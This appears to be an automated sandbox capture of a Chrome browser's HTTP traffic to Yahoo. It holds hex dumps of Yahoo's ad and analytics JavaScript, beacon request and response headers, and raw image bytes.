                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 26 26 28 74 68 69 73 2e 72 65 66 65 72 65 72 55 72 6c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 74 68 69 73 2e 76 69 65 77 65 64 41 72 74 69 63 6c 65 73 2e 61 64 64 28 65 2e 65 6c 65 6d 2e 69 64 29 7d 75 70 64 61 74 65 52 61 70 69 64 41 74 74 72 69 62 75 74 65 73 28 65 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 65 6c 65 6d 3a 74 2c 6d 65 74 61 3a 7b 64 61 74 61 3a 69 7d 7d 3d 65 2c 7b 61 64 4d 65 74 61 3a 73 2c 63 61 6e 6f 6e 69 63 61 6c 55 72 6c 3a 6e 2c 63 6f 6e 74 65 6e 74 54 79 70 65 3a 6f 2c 68 61 73 53 63 72 69 62 62 6c 65 3a 61 3d 21 31 2c 68 61 73 59 61 68 6f 6f 56 69 64 65 6f 3a 72 2c 68 69 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: dow.location.href&&(this.refererUrl=window.location.href),this.viewedArticles.add(e.elem.id)}updateRapidAttributes(e){if(!window.rapidInstance)return;const{elem:t,meta:{data:i}}=e,{adMeta:s,canonicalUrl:n,contentType:o,hasScribble:a=!1,hasYahooVideo:r,hid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 3f 2e 73 65 74 52 61 70 69 64 41 74 74 72 69 62 75 74 65 28 7b 6b 65 79 73 3a 6b 2c 73 70 61 63 65 69 64 3a 76 7d 29 2c 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 26 26 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 69 31 33 6e 26 26 28 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 69 31 33 6e 2e 53 50 41 43 45 49 44 3d 70 61 72 73 65 49 6e 74 28 76 2c 31 30 29 29 7d 62 65 61 63 6f 6e 4d 6f 64 61 6c 43 6f 6e 74 65 6e 74 28 65 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 65 6c 65 6d 3a 7b 69 64 3a 74 7d 7d 3d 65 3b 74 68 69 73 2e 75 70 64 61 74 65 52 61 70 69 64 41 74 74 72 69 62 75 74 65 73 28 65 29 2c 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: indow.rapidInstance?.setRapidAttribute({keys:k,spaceid:v}),window.YAHOO&&window.YAHOO.i13n&&(window.YAHOO.i13n.SPACEID=parseInt(v,10))}beaconModalContent(e){if(!window.rapidInstance)return;const{elem:{id:t}}=e;this.updateRapidAttributes(e),window.rapidIns
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 6e 74 3d 22 68 6f 6d 65 70 61 67 65 2d 76 69 65 77 65 72 22 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 45 76 65 6e 74 3d 22 68 6f 6d 65 70 61 67 65 2d 76 69 65 77 65 72 2d 76 69 65 77 70 6f 72 74 22 2c 74 68 69 73 2e 6f 6e 53 63 72 6f 6c 6c 48 61 6e 64 6c 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 41 64 50 6f 73 69 74 69 6f 6e 73 3d 5b 5d 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 41 64 46 65 74 63 68 53 6c 6f 74 49 6e 64 65 78 3d 5b 5d 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 50 72 65 76 69 6f 75 73 41 64 46 65 74 63 68 53 6c 6f 74 49 6e 64 65 78 3d 5b 5d 2c 74 68 69 73 2e 70 61 67 65 43 6f 6e 74 65 78 74 3d 7b 7d 2c 74 68 69 73 2e 76 69 65 77 65 72 41 64 73 43 6f 6e 66 69 67 3d 7b 7d 2c 74 68 69 73 2e 62 65 6e 6a 69 41 64 49 64 41 72 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nt="homepage-viewer",this.viewportEvent="homepage-viewer-viewport",this.onScrollHandle=null,this.viewportAdPositions=[],this.viewportAdFetchSlotIndex=[],this.viewportPreviousAdFetchSlotIndex=[],this.pageContext={},this.viewerAdsConfig={},this.benjiAdIdArr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 74 68 69 73 2e 6f 6e 50 72 65 50 61 72 73 65 41 64 73 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 70 72 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 73 65 74 57 61 66 65 72 53 74 61 74 65 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 70 72 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 75 70 64 61 74 65 57 61 66 65 72 53 74 61 74 65 49 6e 56 69 65 77 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 6f 6e 41 72 74 69 63 6c 65 49 6e 76 69 65 77 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 69 3f 2e 6f 6e 28 22 52 45 4e 44 45 52 5f 53 55 43 43 45 45 44 45 44 22 2c 74 68 69 73 2e 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this.onPreParseAds.bind(this)),s.on("caas:article:pre:inview",this.setWaferState.bind(this)),s.on("caas:article:pre:inview",this.updateWaferStateInView.bind(this)),s.on("caas:article:inview",this.onArticleInview.bind(this)),i?.on("RENDER_SUCCEEDED",this.o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 6f 73 69 74 69 6f 6e 4d 65 74 61 2e 70 6f 73 69 74 69 6f 6e 73 29 7b 63 6f 6e 73 74 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 2e 63 6c 65 61 6e 29 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 2e 64 65 73 74 29 2c 6f 3d 2d 31 21 3d 3d 48 2e 69 6e 64 65 78 4f 66 28 74 2e 69 64 29 3b 69 66 28 6f 26 26 73 29 7b 63 6f 6e 73 74 20 65 3d 73 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3b 69 66 28 65 26 26 65 2e 69 64 2e 65 6e 64 73 57 69 74 68 28 22 2d 62 61 73 65 22 29 29 63 6f 6e 74 69 6e 75 65 7d 69 66 28 73 26 26 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 6e 29 7b 6f 7c 7c 28 74 2e 69 64 3d 22 55 42 41 22 2b 74 2e 69 64 2c 74 2e 63 6c 65 61 6e 3d 74 3f 2e 63 6c 65 61 6e 3f 2e 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ositionMeta.positions){const s=document.getElementById(t.clean),n=document.getElementById(t.dest),o=-1!==H.indexOf(t.id);if(o&&s){const e=s.parentElement;if(e&&e.id.endsWith("-base"))continue}if(s&&s.parentNode&&n){o||(t.id="UBA"+t.id,t.clean=t?.clean?.re


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    71192.168.2.44983387.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1423OUTGET /_td_api/beacon/performance?ybar-init_0=0.40000000002328306&ybar-mod-sidenav_0=2&ybar-mod-logo_0=0.20000000001164153&ybar-mod-searchbox_0=0.5&ybar-mod-assistjs_0=3.1000000000058208&ybar-mod-adaptivenav_0=0.1999999999825377&ybar-account-init_0=0.7999999999883585&ybar-mail-init_0=1.3999999999941792&ybar-mod-navigation_0=15.10000000000582&ybar-mod-notification_0=0.39999999999417923&src=ybar&_rdn=857363&apptype=default&rid=1pa4ckpjflnfm&bucket=900%2Cseamless&device=desktop&osName=windows%20nt&browserName=chrome&browserVersion=117.0&site=homepage HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC589INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-security-policy-report-only: default-src 'self'; report-uri https://csp.yahoo.com/beacon/csp?src=fendr_beaconeater.media.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:20:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    72192.168.2.44983487.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC519OUTGET /uu/api/res/1.2/D1cC99bQYm9QVoUbD_Rpnw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_tech_153/03d01cbdd7ccafd738da286245b9f503.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="03d01cbdd7ccafd738da286245b9f503.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "574408d007bdd73aac2a0c0e764ecd69"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expiration: expiry-date="Sun, 30 Mar 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 15:55:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:15:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=2;cpu=1;start=2024-09-30T17:15:59.860Z;desc=hit,rtt;dur=88,content-info;desc="width=356,height=180,bytes=20956,owidth=3840,oheight=2160,obytes=1074982,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-request-id: aca85be4a1f7b44fccfec65cc861e43e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cld_id: aca85be4a1f7b44fccfec65cc861e43e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 39905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 1c 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 0c 6c 63 6d 73 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 dc 00 01 00 19 00 03 00 29 00 39 61 63 73 70 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 6c 63 6d 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 64 65 73 63 00 00 00 fc 00 00 00 5e 63 70 72 74 00 00 01 5c 00 00 00 0b 77 74 70 74 00 00 01 68 00 00 00 14 62 6b 70 74 00 00 01 7c 00 00 00 14 72 58 59 5a 00 00 01 90 00 00 00 14 67 58 59 5a 00 00 01 a4 00 00 00 14 62 58 59 5a 00 00 01 b8 00 00 00 14 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: JFIFICC_PROFILElcmsmntrRGB XYZ )9acspAPPL-lcmsdesc^cprt\wtpthbkpt|rXYZgXYZbXYZr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 3c b4 ac a2 1c b6 90 2a 7b bd 5f 79 a4 a5 96 94 52 d3 d2 ee 0d 23 14 cb 88 cf e6 f5 1e 0f 3f 7f bf 4c db 69 9e 15 64 8e b1 22 b6 e2 df 5c b7 2a b5 9d 9a ac 85 50 14 00 db 42 0d ab 8e 54 10 01 ff 00 d2 38 c7 39 61 af 62 33 92 55 d6 ae 5b d5 44 2d 70 a2 fa ea f8 6a 77 8a 58 d5 23 5f 2c 95 dd ec 01 c9 fb 7b e4 9e 9a b5 c5 b7 73 8b 5a 39 ee 06 e1 9b cc 3f 4f 29 92 58 16 0d ad eb ce e5 07 72 fb 8c 10 70 01 fc be fe e3 a5 f5 29 a7 e9 64 e0 6e d3 66 a8 6a c3 0d f6 dc f1 45 56 c8 c6 30 c1 84 6f 9c ae 7e 43 02 33 f2 31 9c 7c f5 9b 70 f1 8e 8c 8e 7d 80 ed 59 6d 8d ae f5 15 76 25 91 d2 27 43 e5 ef d8 03 a8 f7 76 62 46 03 02 49 c8 1f 6c 7c ec 59 dc ee 5b 44 1f 1f 86 45 d2 ba 8b 4d df 29 6a 6a 75 1d 45 2b 54 09 7f 76 de b3 50 3f ea 60 e3 66 dc 0c 1c 9f 7e 73 d1 2e 6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <*{_yR#?Lid"\*PBT89ab3U[D-pjwX#_,{sZ9?O)Xrp)dnfjEV0o~C31|p}Ymv%'CvbFIl|Y[DEM)jjuE+TvP?`f~s.m
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 81 49 77 03 6b 52 b6 d9 a6 20 91 3e 9e 36 82 27 48 98 49 bd 59 5c e4 91 8c a8 39 72 78 39 1c f2 38 c3 49 52 75 81 7b f2 07 57 57 d6 bd 03 5e 26 82 16 d9 2b 53 31 70 03 b3 2f bf b0 f6 e7 ad 75 6c bb 8e ab 5c fb 90 23 bd 5c 40 63 45 4d e4 23 31 26 38 c1 0a 0f e9 cf b7 b7 46 50 c1 2e d9 3e ec ea db 45 15 35 25 cd ab a4 a9 74 8d a2 6a 76 48 1f 0c ca 00 38 cf fa 38 24 fb 64 e0 f5 e2 2e 6b f8 92 d9 c1 6f 25 f6 1a 7a 84 be d9 e2 3e 53 94 8c af 94 cc 88 55 b0 46 31 ef ee 3a 0c 2d fd ce 55 70 4f ed c7 93 49 dc 9b 4e a7 b9 5c a4 b3 db a8 a7 15 ab 5d 1c 2a 73 e5 bf a7 68 66 00 e4 e3 ee 46 7f 2b 0c e1 f8 49 c3 b9 2a 7b 87 86 ab b1 e9 2e ef f7 5a 4b fd b3 55 4f 59 6b af a2 f3 ee 51 ba 14 0e c9 bd b6 c4 84 e5 63 c6 c3 b7 dc 00 4f 4c ca f6 84 57 3d c2 a4 54 ea 7a 84 d7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: IwkR >6'HIY\9rx98IRu{WW^&+S1p/ul\#\@cEM#1&8FP.>E5%tjvH88$d.ko%z>SUF1:-UpOIN\]*shfF+I*{.ZKUOYkQcOLW=Tz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 69 f5 bd de a7 4b 59 e3 82 4a 4a 4a b3 4b 49 53 f4 8c 81 a2 67 41 e6 f9 6c c0 09 19 76 64 31 c8 0a 06 06 73 d0 62 9d b5 7f f4 95 c0 3c cb 78 b7 d9 be ae e3 47 74 b9 bb 34 d0 44 ad 94 86 34 75 5f 2d e3 70 f8 69 03 36 58 7b 7a 00 27 2d d6 8a da de 5a 27 00 be b1 a3 4a 6a 81 22 87 8e 7f 27 69 82 a6 32 db 77 81 ea 07 85 2c f8 3b 58 12 00 1f 07 d9 aa 6f 0f 8e c2 55 97 25 33 b4 b1 cb 1d e2 ba 9d f7 cb 2f 9b 55 14 94 be b8 22 c8 f6 1b bf 33 07 62 71 8c 10 a4 72 32 5c ca 92 fc 89 51 e0 be b3 e9 4b a5 de c4 2e 2f 4a 6d a4 2a 79 0f 1d 2f aa 62 d8 52 a8 77 61 94 15 e7 8e 58 67 ef 9c 6b cb ba 36 9e 97 d2 72 63 23 52 eb 3d 7d a7 34 05 4e 8c 9d e8 6d 86 44 69 55 e1 64 13 c5 4e 02 90 c1 c6 01 63 9e 71 ea 6e 70 79 c7 59 16 7a 5d a6 a5 73 e3 69 37 fd cb cb 94 c1 ff 00 0e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: iKYJJJKISgAlvd1sb<xGt4D4u_-pi6X{z'-Z'Jj"'i2w,;XoU%3/U"3bqr2\QK./Jm*y/bRwaXgk6rc#R=}4NmDiUdNcqnpyYz]si7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 79 3c 01 81 f3 9c 11 dc d7 8f 02 f2 c6 48 d3 5b 2d 15 5e 4c 76 ad 44 d4 d2 52 4f c1 48 70 c6 30 46 e3 b8 36 46 d5 c9 e3 dc fd b3 c3 b6 b7 19 5c a2 dc 19 d3 da 2f 8c f5 37 7d 37 66 a5 90 30 db 4d 35 c0 22 54 84 60 3d 71 c6 ec 32 06 d6 3b ce 7d fa 2a 74 13 f5 48 c8 19 f5 ba ad 6e f0 49 4b 55 50 97 65 a8 31 ec 42 4c 9b f3 9d a0 f0 3e 7a 75 3b 6f 63 90 61 a1 ab bf 16 ba 41 a0 af 14 55 35 d1 45 59 25 d6 36 a4 40 d5 29 22 86 32 00 18 85 65 65 5e 41 39 2c 14 e4 93 d2 17 d6 d1 8a 77 14 7f f6 35 45 b7 c1 d5 16 58 2b 2b 6f 34 1a 66 9a 6a c9 60 b2 c1 5f 7b ba d6 4b 0f 98 e5 60 44 d9 1c 92 6d fd d4 3e 56 42 11 97 1f f1 60 2f e6 3e 5a 52 a3 a9 51 fb 33 4e 1d 89 15 17 7d 5d 77 b9 d4 dd ad b7 e7 b5 57 de 20 33 53 d5 55 c3 84 a0 53 2a c8 16 18 7f 2c d9 1b 03 16 0b 80 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: y<H[-^LvDROHp0F6F\/7}7f0M5"T`=q2;}*tHnIKUPe1BL>zu;ocaAU5EY%6@)"2ee^A9,w5EX++o4fj`_{K`Dm>VB`/>ZRQ3N}]wW 3SUS*,}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC292INData Raw: fa 7a 9a 4a 25 7a dd 49 25 c9 e6 91 44 91 19 82 2c 8a 0e 70 b8 04 11 f7 e7 ed d7 2b 8e 78 45 67 d8 8d 6b fc 0a 86 ae 6a bd 3f 69 a3 b5 53 ba 01 2a 08 43 4b 90 a7 f7 64 83 9e 70 79 03 f8 f3 9e ad 75 9b 8f cc 5e 82 49 bc 94 57 ee e4 54 c1 5d 05 3c b0 f9 ed 5a c7 6c bf f1 7b 93 70 f4 83 ce e6 c0 1c f1 f9 ba 3d a5 ae 3b 9d 2b 8f 60 5a f2 d2 d5 54 bb df 2b ab bc f7 44 f2 84 64 37 96 06 32 0a e7 77 b2 fb fb f1 d3 fb 5f fd 21 79 4f 25 55 6c 34 b5 55 2b 5d 6e ab 9b e9 d9 f6 80 18 ee 03 dc 95 20 f3 83 b4 e3 df db a7 78 4b 2c 0e 59 69 ba e5 6e 92 58 2a 91 5e 36 80 98 62 9d fd 50 93 ee 7e 4e 33 ec 0f c7 4b 25 46 bb 2d 96 2f 35 5c ef 6d bd 47 35 2d 4e 6a a1 7d c5 95 17 cb 00 63 60 0a 47 3c 63 df fa 75 ab 6a ba cb 08 98 c5 3c e4 bb ed 65 ca be 4b fd e6 f1 e5 ac b3 47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: zJ%zI%D,p+xEgkj?iS*CKdpyu^IWT]<Zl{p=;+`ZT+Dd72w_!yO%Ul4U+]n xK,YinX*^6bP~N3K%F-/5\mG5-Nj}c`G<cuj<eKG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: b5 99 92 9d 5e 12 ee 49 01 54 f2 c7 0e 32 09 1f 1d 67 57 8e 6a a1 57 c6 e3 0b 5e a3 b9 53 5a af 15 e6 e3 22 32 ca 95 cd 17 ad 07 ef 1c c7 b0 03 c2 ae d6 fe 18 c0 cf b8 e9 9d 99 58 48 aa ce 32 13 cb ae 34 b6 b7 b7 50 d3 c8 af 0a 18 d2 94 97 6d b3 65 00 1b 83 83 b4 e5 76 fb f0 49 f6 eb 36 56 55 ed d6 4b a9 25 c4 89 97 db 5e 80 82 d9 1d cc 5b da b4 98 c5 54 66 29 44 7f 54 a4 85 c3 2c 64 15 65 39 1e ff 00 1e c3 23 2b 37 5b b6 09 6e 96 05 fd d2 bf 46 df 75 5c 02 9a aa b2 d9 62 8e 11 b9 92 35 95 86 33 88 c2 fc 64 90 33 83 8e 9b f0 f5 d5 0c e0 0e 79 e0 37 bf d5 45 76 96 6b 56 88 d3 15 95 0b 68 a3 5a fa 82 cb e6 ca 62 20 0c c9 b1 78 03 7a e7 8c 73 f1 d2 a9 7f de f7 08 b0 53 cd a9 5f b7 57 06 b0 eb 0d 31 59 6e be 51 cc 61 ad f3 29 f6 4d 09 db c3 3a 16 00 b0 2d 9c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ^IT2gWjW^SZ"2XH24PmevI6VUK%^[Tf)DT,de9#+7[nFu\b53d3y7EvkVhZb xzsS_W1YnQa)M:-
